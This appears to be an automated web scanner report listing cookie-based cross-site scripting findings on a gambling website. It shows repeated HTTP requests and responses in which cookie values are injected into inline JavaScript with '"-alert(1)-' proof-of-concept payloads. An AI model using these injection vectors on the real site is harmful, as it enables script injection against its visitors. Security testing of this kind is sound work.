HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:29:30 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG4e14a%22%3E Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:31 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 28429 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM9ead3"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48091 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM9ead3"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:04:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM13162" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48090 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM13162"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Affiliates.aspx |
GET /Affiliates.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:06:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMdc676"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46316 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMdc676"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Affiliates.aspx |
GET /Affiliates.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:06:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM8c517" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46316 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM8c517"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsChat.aspx |
GET /ContactUsChat.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM3fe90"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46892 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM3fe90"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsChat.aspx |
GET /ContactUsChat.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:07:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMc5f48" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46892 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMc5f48"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsFax.aspx |
GET /ContactUsFax.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM9dd51"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46758 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM9dd51"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsFax.aspx |
GET /ContactUsFax.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:07:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMe8b11" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46758 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMe8b11"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:07:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMa56fe"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54327 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMa56fe"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:07:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMd4ff8" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54327 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMd4ff8"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsTel.aspx |
GET /ContactUsTel.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:07:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMe206d"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46549 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMe206d"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /ContactUsTel.aspx |
GET /ContactUsTel.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:06:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMcf7c1" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46549 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMcf7c1"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /FAQ.aspx |
GET /FAQ.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM95447"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 95046 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM95447"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /FAQ.aspx |
GET /FAQ.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM310e5" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 95046 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM310e5"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMf934b"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47979 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMf934b"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /FairPlay.aspx |
GET /FairPlay.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM57b8e" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47979 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM57b8e"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM185cc"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47210 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM185cc"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Help.aspx |
GET /Help.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMa1333" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47211 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMa1333"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Home.aspx |
GET /Home.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:09:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM70d67"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47481 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM70d67"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Home.aspx |
GET /Home.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:09:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM380a7" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 47480 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM380a7"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM13a03"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 58730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM13a03"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /InviteFriend.aspx |
GET /InviteFriend.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
